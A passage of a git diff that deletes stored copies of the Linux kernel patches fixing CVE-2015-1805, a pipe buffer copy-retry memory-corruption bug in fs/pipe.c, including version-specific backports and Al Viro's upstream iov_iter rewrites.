-diff --git a/fs/pipe.c b/fs/pipe.c
-index d2c45e1..d866c6f 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -117,25 +117,27 @@
- }
-
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
-- int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+ if (__copy_from_user_inatomic(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- } else {
-- if (copy_from_user(to, iov->iov_base, copy))
-+ if (copy_from_user(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- }
-- to += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -143,25 +145,27 @@
- }
-
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
-- int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+ if (__copy_to_user_inatomic(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- } else {
-- if (copy_to_user(iov->iov_base, from, copy))
-+ if (copy_to_user(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- }
-- from += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -395,7 +399,7 @@
- struct pipe_buffer *buf = pipe->bufs + curbuf;
- const struct pipe_buf_operations *ops = buf->ops;
- void *addr;
-- size_t chars = buf->len;
-+ size_t chars = buf->len, remaining;
- int error, atomic;
-
- if (chars > total_len)
-@@ -409,9 +413,11 @@
- }
-
- atomic = !iov_fault_in_pages_write(iov, chars);
-+ remaining = chars;
- redo:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+ error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- if (unlikely(error)) {
- /*
-@@ -426,7 +432,6 @@
- break;
- }
- ret += chars;
-- buf->offset += chars;
- buf->len -= chars;
-
- /* Was it a packet buffer? Clean up and exit */
-@@ -531,6 +536,7 @@
- if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- int error, atomic = 1;
- void *addr;
-+ size_t remaining = chars;
-
- error = ops->confirm(pipe, buf);
- if (error)
-@@ -539,8 +545,8 @@
- iov_fault_in_pages_read(iov, chars);
- redo1:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_from_user(offset + addr, iov,
-- chars, atomic);
-+ error = pipe_iov_copy_from_user(addr, &offset, iov,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- ret = error;
- do_wakeup = 1;
-@@ -575,6 +581,8 @@
- struct page *page = pipe->tmp_page;
- char *src;
- int error, atomic = 1;
-+ int offset = 0;
-+ size_t remaining;
-
- if (!page) {
- page = alloc_page(GFP_HIGHUSER);
-@@ -595,14 +603,15 @@
- chars = total_len;
-
- iov_fault_in_pages_read(iov, chars);
-+ remaining = chars;
- redo2:
- if (atomic)
- src = kmap_atomic(page);
- else
- src = kmap(page);
-
-- error = pipe_iov_copy_from_user(src, iov, chars,
-- atomic);
-+ error = pipe_iov_copy_from_user(src, &offset, iov,
-+ &remaining, atomic);
- if (atomic)
- kunmap_atomic(src);
- else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64
deleted file mode 100644
index 42ecdafc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch
deleted file mode 100644
index 0f9c18b8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 78fd0d0..46f1ab2 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -117,25 +117,27 @@
- }
-
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
-- int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+ if (__copy_from_user_inatomic(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- } else {
-- if (copy_from_user(to, iov->iov_base, copy))
-+ if (copy_from_user(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- }
-- to += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -143,25 +145,27 @@
- }
-
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
-- int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+ if (__copy_to_user_inatomic(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- } else {
-- if (copy_to_user(iov->iov_base, from, copy))
-+ if (copy_to_user(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- }
-- from += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -395,7 +399,7 @@
- struct pipe_buffer *buf = pipe->bufs + curbuf;
- const struct pipe_buf_operations *ops = buf->ops;
- void *addr;
-- size_t chars = buf->len;
-+ size_t chars = buf->len, remaining;
- int error, atomic;
-
- if (chars > total_len)
-@@ -409,9 +413,11 @@
- }
-
- atomic = !iov_fault_in_pages_write(iov, chars);
-+ remaining = chars;
- redo:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+ error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- if (unlikely(error)) {
- /*
-@@ -426,7 +432,6 @@
- break;
- }
- ret += chars;
-- buf->offset += chars;
- buf->len -= chars;
-
- /* Was it a packet buffer? Clean up and exit */
-@@ -531,6 +536,7 @@
- if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- int error, atomic = 1;
- void *addr;
-+ size_t remaining = chars;
-
- error = ops->confirm(pipe, buf);
- if (error)
-@@ -539,8 +545,8 @@
- iov_fault_in_pages_read(iov, chars);
- redo1:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_from_user(offset + addr, iov,
-- chars, atomic);
-+ error = pipe_iov_copy_from_user(addr, &offset, iov,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- ret = error;
- do_wakeup = 1;
-@@ -575,6 +581,8 @@
- struct page *page = pipe->tmp_page;
- char *src;
- int error, atomic = 1;
-+ int offset = 0;
-+ size_t remaining;
-
- if (!page) {
- page = alloc_page(GFP_HIGHUSER);
-@@ -595,14 +603,15 @@
- chars = total_len;
-
- iov_fault_in_pages_read(iov, chars);
-+ remaining = chars;
- redo2:
- if (atomic)
- src = kmap_atomic(page);
- else
- src = kmap(page);
-
-- error = pipe_iov_copy_from_user(src, iov, chars,
-- atomic);
-+ error = pipe_iov_copy_from_user(src, &offset, iov,
-+ &remaining, atomic);
- if (atomic)
- kunmap_atomic(src);
- else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64
deleted file mode 100644
index 870cdeab..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.14/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch
deleted file mode 100644
index c4f86752..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.16/0004.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From a39bf4a8e29c7336c0c72652b7d0dd1cd1b13c51 Mon Sep 17 00:00:00 2001
-From: Ben Hutchings
-Date: Mon, 15 Jun 2015 03:51:55 +0100
-Subject: pipe: iovec: Fix memory corruption when retrying atomic copy as
- non-atomic
-
-pipe_iov_copy_{from,to}_user() may be tried twice with the same iovec,
-the first time atomically and the second time not. The second attempt
-needs to continue from the iovec position, pipe buffer offset and
-remaining length where the first attempt failed, but currently the
-pipe buffer offset and remaining length are reset. This will corrupt
-the piped data (possibly also leading to an information leak between
-processes) and may also corrupt kernel memory.
-
-This was fixed upstream by commits f0d1bec9d58d ("new helper:
-copy_page_from_iter()") and 637b58c2887e ("switch pipe_read() to
-copy_page_to_iter()"), but those aren't suitable for stable. This fix
-for older kernel versions was made by Seth Jennings for RHEL and I
-have extracted it from their update.
-
-CVE-2015-1805
-
-References: https://bugzilla.redhat.com/show_bug.cgi?id=1202855
-Signed-off-by: Ben Hutchings
-[lizf: Backported to 3.4: adjust context]
-Signed-off-by: Zefan Li
----
- fs/pipe.c | 55 ++++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 32 insertions(+), 23 deletions(-)
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 1667e6f..abfb935 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -104,25 +104,27 @@ void pipe_wait(struct pipe_inode_info *pipe)
- }
-
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
-- int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+ if (__copy_from_user_inatomic(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- } else {
-- if (copy_from_user(to, iov->iov_base, copy))
-+ if (copy_from_user(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- }
-- to += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -130,25 +132,27 @@ pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
- }
-
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
-- int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+ if (__copy_to_user_inatomic(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- } else {
-- if (copy_to_user(iov->iov_base, from, copy))
-+ if (copy_to_user(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- }
-- from += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -384,7 +388,7 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- struct pipe_buffer *buf = pipe->bufs + curbuf;
- const struct pipe_buf_operations *ops = buf->ops;
- void *addr;
-- size_t chars = buf->len;
-+ size_t chars = buf->len, remaining;
- int error, atomic;
-
- if (chars > total_len)
-@@ -398,9 +402,11 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- }
-
- atomic = !iov_fault_in_pages_write(iov, chars);
-+ remaining = chars;
- redo:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+ error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- if (unlikely(error)) {
- /*
-@@ -415,7 +421,6 @@ redo:
- break;
- }
- ret += chars;
-- buf->offset += chars;
- buf->len -= chars;
-
- /* Was it a packet buffer? Clean up and exit */
-@@ -522,6 +527,7 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov,
- if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- int error, atomic = 1;
- void *addr;
-+ size_t remaining = chars;
-
- error = ops->confirm(pipe, buf);
- if (error)
-@@ -530,8 +536,8 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov,
- iov_fault_in_pages_read(iov, chars);
- redo1:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_from_user(offset + addr, iov,
-- chars, atomic);
-+ error = pipe_iov_copy_from_user(addr, &offset, iov,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- ret = error;
- do_wakeup = 1;
-@@ -566,6 +572,8 @@ redo1:
- struct page *page = pipe->tmp_page;
- char *src;
- int error, atomic = 1;
-+ int offset = 0;
-+ size_t remaining;
-
- if (!page) {
- page = alloc_page(GFP_HIGHUSER);
-@@ -586,14 +594,15 @@ redo1:
- chars = total_len;
-
- iov_fault_in_pages_read(iov, chars);
-+ remaining = chars;
- redo2:
- if (atomic)
- src = kmap_atomic(page);
- else
- src = kmap(page);
-
-- error = pipe_iov_copy_from_user(src, iov, chars,
-- atomic);
-+ error = pipe_iov_copy_from_user(src, &offset, iov,
-+ &remaining, atomic);
- if (atomic)
- kunmap_atomic(src);
- else
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch
deleted file mode 100644
index ec40d3ec..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 125f32f..a6321e0 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -104,25 +104,27 @@
- }
-
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
-- int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+ if (__copy_from_user_inatomic(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- } else {
-- if (copy_from_user(to, iov->iov_base, copy))
-+ if (copy_from_user(addr + *offset,
-+ iov->iov_base, copy))
- return -EFAULT;
- }
-- to += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -130,25 +132,27 @@
- }
-
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
-- int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+ size_t *remaining, int atomic)
- {
- unsigned long copy;
-
-- while (len > 0) {
-+ while (*remaining > 0) {
- while (!iov->iov_len)
- iov++;
-- copy = min_t(unsigned long, len, iov->iov_len);
-+ copy = min_t(unsigned long, *remaining, iov->iov_len);
-
- if (atomic) {
-- if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+ if (__copy_to_user_inatomic(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- } else {
-- if (copy_to_user(iov->iov_base, from, copy))
-+ if (copy_to_user(iov->iov_base,
-+ addr + *offset, copy))
- return -EFAULT;
- }
-- from += copy;
-- len -= copy;
-+ *offset += copy;
-+ *remaining -= copy;
- iov->iov_base += copy;
- iov->iov_len -= copy;
- }
-@@ -384,7 +388,7 @@
- struct pipe_buffer *buf = pipe->bufs + curbuf;
- const struct pipe_buf_operations *ops = buf->ops;
- void *addr;
-- size_t chars = buf->len;
-+ size_t chars = buf->len, remaining;
- int error, atomic;
-
- if (chars > total_len)
-@@ -398,9 +402,11 @@
- }
-
- atomic = !iov_fault_in_pages_write(iov, chars);
-+ remaining = chars;
- redo:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+ error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- if (unlikely(error)) {
- /*
-@@ -415,7 +421,6 @@
- break;
- }
- ret += chars;
-- buf->offset += chars;
- buf->len -= chars;
-
- /* Was it a packet buffer? Clean up and exit */
-@@ -522,6 +527,7 @@
- if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- int error, atomic = 1;
- void *addr;
-+ size_t remaining = chars;
-
- error = ops->confirm(pipe, buf);
- if (error)
-@@ -530,8 +536,8 @@
- iov_fault_in_pages_read(iov, chars);
- redo1:
- addr = ops->map(pipe, buf, atomic);
-- error = pipe_iov_copy_from_user(offset + addr, iov,
-- chars, atomic);
-+ error = pipe_iov_copy_from_user(addr, &offset, iov,
-+ &remaining, atomic);
- ops->unmap(pipe, buf, addr);
- ret = error;
- do_wakeup = 1;
-@@ -566,6 +572,8 @@
- struct page *page = pipe->tmp_page;
- char *src;
- int error, atomic = 1;
-+ int offset = 0;
-+ size_t remaining;
-
- if (!page) {
- page = alloc_page(GFP_HIGHUSER);
-@@ -586,14 +594,15 @@
- chars = total_len;
-
- iov_fault_in_pages_read(iov, chars);
-+ remaining = chars;
- redo2:
- if (atomic)
- src = kmap_atomic(page);
- else
- src = kmap(page);
-
-- error = pipe_iov_copy_from_user(src, iov, chars,
-- atomic);
-+ error = pipe_iov_copy_from_user(src, &offset, iov,
-+ &remaining, atomic);
- if (atomic)
- kunmap_atomic(src);
- else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64
deleted file mode 100644
index c27350af..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch
deleted file mode 100644
index 02c24662..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch
+++ /dev/null
@@ -1,132 +0,0 @@ -From 637b58c2887e5e57850865839cc75f59184b23d1 Mon Sep 17 00:00:00 2001 -From: Al Viro -Date: Mon, 3 Feb 2014 19:11:42 -0500 -Subject: switch pipe_read() to copy_page_to_iter() - -Signed-off-by: Al Viro ---- - fs/pipe.c | 79 +++++++-------------------------------------------------------- - 1 file changed, 8 insertions(+), 71 deletions(-) - -diff --git a/fs/pipe.c b/fs/pipe.c -index 6679c95..034bffa 100644 ---- a/fs/pipe.c -+++ b/fs/pipe.c -@@ -142,55 +142,6 @@ pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len, - return 0; - } - --static int --pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len, -- int atomic) --{ -- unsigned long copy; -- -- while (len > 0) { -- while (!iov->iov_len) -- iov++; -- copy = min_t(unsigned long, len, iov->iov_len); -- -- if (atomic) { -- if (__copy_to_user_inatomic(iov->iov_base, from, copy)) -- return -EFAULT; -- } else { -- if (copy_to_user(iov->iov_base, from, copy)) -- return -EFAULT; -- } -- from += copy; -- len -= copy; -- iov->iov_base += copy; -- iov->iov_len -= copy; -- } -- return 0; --} -- --/* -- * Attempt to pre-fault in the user memory, so we can use atomic copies. -- * Returns the number of bytes not faulted in. -- */ --static int iov_fault_in_pages_write(struct iovec *iov, unsigned long len) --{ -- while (!iov->iov_len) -- iov++; -- -- while (len > 0) { -- unsigned long this_len; -- -- this_len = min_t(unsigned long, len, iov->iov_len); -- if (fault_in_pages_writeable(iov->iov_base, this_len)) -- break; -- -- len -= this_len; -- iov++; -- } -- -- return len; --} -- - /* - * Pre-fault in the user memory, so we can use atomic copies. - */ -@@ -329,12 +280,15 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov, - ssize_t ret; - struct iovec *iov = (struct iovec *)_iov; - size_t total_len; -+ struct iov_iter iter; - - total_len = iov_length(iov, nr_segs); - /* Null read succeeds. 
*/ - if (unlikely(total_len == 0)) - return 0; - -+ iov_iter_init(&iter, iov, nr_segs, total_len, 0); -+ - do_wakeup = 0; - ret = 0; - __pipe_lock(pipe); -@@ -344,9 +298,9 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov, - int curbuf = pipe->curbuf; - struct pipe_buffer *buf = pipe->bufs + curbuf; - const struct pipe_buf_operations *ops = buf->ops; -- void *addr; - size_t chars = buf->len; -- int error, atomic; -+ size_t written; -+ int error; - - if (chars > total_len) - chars = total_len; -@@ -358,27 +312,10 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov, - break; - } - -- atomic = !iov_fault_in_pages_write(iov, chars); --redo: -- if (atomic) -- addr = kmap_atomic(buf->page); -- else -- addr = kmap(buf->page); -- error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic); -- if (atomic) -- kunmap_atomic(addr); -- else -- kunmap(buf->page); -- if (unlikely(error)) { -- /* -- * Just retry with the slow path if we failed. -- */ -- if (atomic) { -- atomic = 0; -- goto redo; -- } -+ written = copy_page_to_iter(buf->page, buf->offset, chars, &iter); -+ if (unlikely(written < chars)) { - if (!ret) -- ret = error; -+ ret = -EFAULT; - break; - } - ret += chars; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch deleted file mode 100644 index 17af5dbc..00000000 --- a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch +++ /dev/null 
@@ -1,326 +0,0 @@ -From f0d1bec9d58d4c038d0ac958c9af82be6eb18045 Mon Sep 17 00:00:00 2001 -From: Al Viro -Date: Thu, 3 Apr 2014 15:05:18 -0400 -Subject: new helper: copy_page_from_iter() - -parallel to copy_page_to_iter(). pipe_write() switched to it (and became -->write_iter()). - -Signed-off-by: Al Viro ---- - fs/pipe.c | 129 ++++++++-------------------------------------------- - include/linux/uio.h | 2 + - mm/iov_iter.c | 78 +++++++++++++++++++++++++++++++ - 3 files changed, 99 insertions(+), 110 deletions(-) - -diff --git a/fs/pipe.c b/fs/pipe.c -index 05ccb00..21981e5 100644 ---- a/fs/pipe.c -+++ b/fs/pipe.c -@@ -116,50 +116,6 @@ void pipe_wait(struct pipe_inode_info *pipe) - pipe_lock(pipe); - } - --static int --pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len, -- int atomic) --{ -- unsigned long copy; -- -- while (len > 0) { -- while (!iov->iov_len) -- iov++; -- copy = min_t(unsigned long, len, iov->iov_len); -- -- if (atomic) { -- if (__copy_from_user_inatomic(to, iov->iov_base, copy)) -- return -EFAULT; -- } else { -- if (copy_from_user(to, iov->iov_base, copy)) -- return -EFAULT; -- } -- to += copy; -- len -= copy; -- iov->iov_base += copy; -- iov->iov_len -= copy; -- } -- return 0; --} -- --/* -- * Pre-fault in the user memory, so we can use atomic copies. 
-- */ --static void iov_fault_in_pages_read(struct iovec *iov, unsigned long len) --{ -- while (!iov->iov_len) -- iov++; -- -- while (len > 0) { -- unsigned long this_len; -- -- this_len = min_t(unsigned long, len, iov->iov_len); -- fault_in_pages_readable(iov->iov_base, this_len); -- len -= this_len; -- iov++; -- } --} -- - static void anon_pipe_buf_release(struct pipe_inode_info *pipe, - struct pipe_buffer *buf) - { -@@ -380,24 +336,19 @@ static inline int is_packetized(struct file *file) - } - - static ssize_t --pipe_write(struct kiocb *iocb, const struct iovec *_iov, -- unsigned long nr_segs, loff_t ppos) -+pipe_write(struct kiocb *iocb, struct iov_iter *from) - { - struct file *filp = iocb->ki_filp; - struct pipe_inode_info *pipe = filp->private_data; -- ssize_t ret; -- int do_wakeup; -- struct iovec *iov = (struct iovec *)_iov; -- size_t total_len; -+ ssize_t ret = 0; -+ int do_wakeup = 0; -+ size_t total_len = iov_iter_count(from); - ssize_t chars; - -- total_len = iov_length(iov, nr_segs); - /* Null write succeeds. 
*/ - if (unlikely(total_len == 0)) - return 0; - -- do_wakeup = 0; -- ret = 0; - __pipe_lock(pipe); - - if (!pipe->readers) { -@@ -416,38 +367,19 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov, - int offset = buf->offset + buf->len; - - if (ops->can_merge && offset + chars <= PAGE_SIZE) { -- int error, atomic = 1; -- void *addr; -- -- error = ops->confirm(pipe, buf); -+ int error = ops->confirm(pipe, buf); - if (error) - goto out; - -- iov_fault_in_pages_read(iov, chars); --redo1: -- if (atomic) -- addr = kmap_atomic(buf->page); -- else -- addr = kmap(buf->page); -- error = pipe_iov_copy_from_user(offset + addr, iov, -- chars, atomic); -- if (atomic) -- kunmap_atomic(addr); -- else -- kunmap(buf->page); -- ret = error; -- do_wakeup = 1; -- if (error) { -- if (atomic) { -- atomic = 0; -- goto redo1; -- } -+ ret = copy_page_from_iter(buf->page, offset, chars, from); -+ if (unlikely(ret < chars)) { -+ error = -EFAULT; - goto out; - } -+ do_wakeup = 1; - buf->len += chars; -- total_len -= chars; - ret = chars; -- if (!total_len) -+ if (!iov_iter_count(from)) - goto out; - } - } -@@ -466,8 +398,7 @@ redo1: - int newbuf = (pipe->curbuf + bufs) & (pipe->buffers-1); - struct pipe_buffer *buf = pipe->bufs + newbuf; - struct page *page = pipe->tmp_page; -- char *src; -- int error, atomic = 1; -+ int copied; - - if (!page) { - page = alloc_page(GFP_HIGHUSER); -@@ -483,40 +414,19 @@ redo1: - * FIXME! Is this really true? 
- */ - do_wakeup = 1; -- chars = PAGE_SIZE; -- if (chars > total_len) -- chars = total_len; -- -- iov_fault_in_pages_read(iov, chars); --redo2: -- if (atomic) -- src = kmap_atomic(page); -- else -- src = kmap(page); -- -- error = pipe_iov_copy_from_user(src, iov, chars, -- atomic); -- if (atomic) -- kunmap_atomic(src); -- else -- kunmap(page); -- -- if (unlikely(error)) { -- if (atomic) { -- atomic = 0; -- goto redo2; -- } -+ copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); -+ if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) { - if (!ret) -- ret = error; -+ ret = -EFAULT; - break; - } -- ret += chars; -+ ret += copied; - - /* Insert it into the buffer array */ - buf->page = page; - buf->ops = &anon_pipe_buf_ops; - buf->offset = 0; -- buf->len = chars; -+ buf->len = copied; - buf->flags = 0; - if (is_packetized(filp)) { - buf->ops = &packet_pipe_buf_ops; -@@ -525,8 +435,7 @@ redo2: - pipe->nrbufs = ++bufs; - pipe->tmp_page = NULL; - -- total_len -= chars; -- if (!total_len) -+ if (!iov_iter_count(from)) - break; - } - if (bufs < pipe->buffers) -@@ -1040,8 +949,8 @@ const struct file_operations pipefifo_fops = { - .llseek = no_llseek, - .read = new_sync_read, - .read_iter = pipe_read, -- .write = do_sync_write, -- .aio_write = pipe_write, -+ .write = new_sync_write, -+ .write_iter = pipe_write, - .poll = pipe_poll, - .unlocked_ioctl = pipe_ioctl, - .release = pipe_release, -diff --git a/include/linux/uio.h b/include/linux/uio.h -index 532f59d..6601235 100644 ---- a/include/linux/uio.h -+++ b/include/linux/uio.h -@@ -68,6 +68,8 @@ int iov_iter_fault_in_readable(struct iov_iter *i, size_t bytes); - size_t iov_iter_single_seg_count(const struct iov_iter *i); - size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, - struct iov_iter *i); -+size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes, -+ struct iov_iter *i); - unsigned long iov_iter_alignment(const struct iov_iter *i); - void iov_iter_init(struct iov_iter *i, 
